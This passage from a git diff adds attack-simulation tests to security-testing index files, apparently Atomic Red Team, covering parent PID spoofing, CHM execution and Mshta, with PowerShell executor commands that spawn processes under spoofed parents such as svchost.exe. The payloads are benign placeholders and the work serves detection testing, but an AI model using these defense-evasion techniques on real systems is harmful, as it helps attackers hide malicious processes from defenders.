diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index df30d489..ac1ca6d0 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -38,6 +38,10 @@ privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
@@ -245,6 +249,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -339,6 +348,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -355,6 +370,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 03989321..d7f2c379 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -25,6 +25,10 @@ privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Glo
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
@@ -74,6 +78,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -132,6 +141,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -147,6 +162,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c3805661..fd0c9ef3 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -89,6 +89,10 @@
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -499,6 +503,11 @@
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+ - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+ - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+ - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+ - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+ - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
@@ -650,6 +659,12 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+ - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+ - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+ - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+ - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+ - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -672,6 +687,10 @@
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a067f6b0..8e5be8f7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -62,6 +62,10 @@
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -153,6 +157,11 @@
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
+ - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
+ - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
+ - Atomic Test #5: Invoke CHM Simulate Double click [windows]
+ - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
+ - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
@@ -255,6 +264,12 @@
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
+ - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
+ - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
+ - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
+ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
+ - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
+ - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -276,6 +291,10 @@
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
+ - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
+ - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
+ - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
+ - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8ab000e2..aadbbec2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -4496,6 +4496,134 @@ privilege-escalation:
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
+ - name: Parent PID Spoofing - Spawn from Current Process
+ auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+ description: Spawns a powershell.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+ ''#{command_line}'' -ParentId #{parent_pid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from Specified Process
+ auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+ description: Spawns a notepad.exe process as a child of the current process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ parent_pid:
+ description: PID of process to spawn from
+ type: string
+ default: "$PID"
+ test_guid:
+ description: Defined test GUID
+ type: string
+ default: 12345678-1234-1234-1234-123456789123
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
+ #{test_guid}'
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from svchost.exe
+ auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+ description: Spawnd a process as a child of the first accessible svchost.exe
+ process.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+ ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+ Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+ -CommandLine ''#{command_line}'''
+ name: powershell
+ - name: Parent PID Spoofing - Spawn from New Process
+ auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+ description: Creates a notepad.exe process and then spawns a powershell.exe
+ process as a child of it.
+ supported_platforms:
+ - windows
+ input_arguments:
+ command_line:
+ description: Specified command line to use
+ type: string
+ default: "-Command Start-Sleep 10"
+ file_path:
+ description: File path or name of process to spawn
+ type: path
+ default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+ parent_name:
+ description: Parent process to spoof from
+ type: path
+ default: "$Env:windir\\System32\\notepad.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+ -FilePath #{file_path} -CommandLine ''#{command_line}'''
+ name: powershell
T1034:
technique:
id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02
@@ -22968,6 +23096,174 @@ defense-evasion:
'
name: command_prompt
+ - name: Invoke CHM with default Shortcut Command Execution
+ auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+ description: Executes a CHM file with the default Shortcut Command method.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
+ #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM with InfoTech Storage Protocol Handler
+ auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+ description: Executes a CHM file with the ITS protocol handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: "$env:windir\\hh.exe"
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
+ -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM Simulate Double click
+ auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+ description: Executes a CHM file simulating a user double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+ must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+ -Force
+
+'
+ executor:
+ command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+ name: powershell
+ - name: Invoke CHM with Script Engine and Help Topic
+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
